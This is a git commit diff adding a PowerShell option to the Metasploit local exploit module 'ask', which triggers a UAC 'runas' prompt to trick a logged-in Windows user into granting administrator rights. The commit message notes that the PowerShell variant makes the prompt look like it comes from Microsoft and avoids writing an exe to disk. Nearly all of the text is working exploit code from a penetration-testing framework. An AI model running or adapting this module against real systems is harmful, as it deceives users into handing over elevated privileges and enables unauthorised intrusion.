Added PSH option to windows/local/ask exploit

Gives you the ability to use powershell to 'ask' for admin rights if the user has them. Using powershell makes the pop up blue instead of orange and states that the company is Microsoft, it also doesn't drop an exe on the system. Looks like 32 bit https works but if you migrate out you loose priv and if you run cachedump the session hangs.
2013-10-19 00:15:38 -07:00 · 2013-10-19 00:15:38 -07:00 · a5dc75a82e
parent 8059c59f15
commit a5dc75a82e
1 changed files with 42 additions and 25 deletions
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@ -7,12 +7,14 @@

 require 'msf/core'
 require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'

 class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::EXE
  include Post::File
+  include Exploit::Powershell

  def initialize(info={})
    super( update_info( info,
@ -23,7 +25,10 @@ class Metasploit3 < Msf::Exploit::Local
        UAC settings.
      },
      'License'       => MSF_LICENSE,
-      'Author'        => [ 'mubix' ],
+      'Author'        => [
+          'mubix', # Original technique
+          'b00stfr3ak' # Added powershell option
+      ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
@ -31,13 +36,14 @@ class Metasploit3 < Msf::Exploit::Local
      'References'    => [
        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
      ],
-      'DisclosureDate'=> "Jan 3 2012"
+      'DisclosureDate'=> "Jan 3 2012",
    ))

    register_options([
      OptString.new("FILENAME", [ false, "File name on disk"]),
      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
    ])

  end
@ -71,7 +77,10 @@ class Metasploit3 < Msf::Exploit::Local
    #
    # Generate payload and random names for upload
    #
-    payload = generate_payload_exe
+
+    if datastore["TECHNIQUE"] == "EXE"
+      if datastore["UPLOAD"]
+        exe_payload = generate_exe_payload_exe

        if datastore["FILENAME"]
          payload_filename = datastore["FILENAME"]
@ -88,14 +97,22 @@ class Metasploit3 < Msf::Exploit::Local
        cmd_location = "#{payload_path}\\#{payload_filename}"

        if datastore["UPLOAD"]
-      print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
+          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
          fd = session.fs.file.new(cmd_location, "wb")
-      fd.write(payload)
+          fd.write(exe_payload)
          fd.close
        end

        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-
+      else
+        print_error("No Upload Path!")
+        return
+      end
+    else
+      command = cmd_psh_payload(payload.encoded)
+      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
+      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
+    end
  end
 end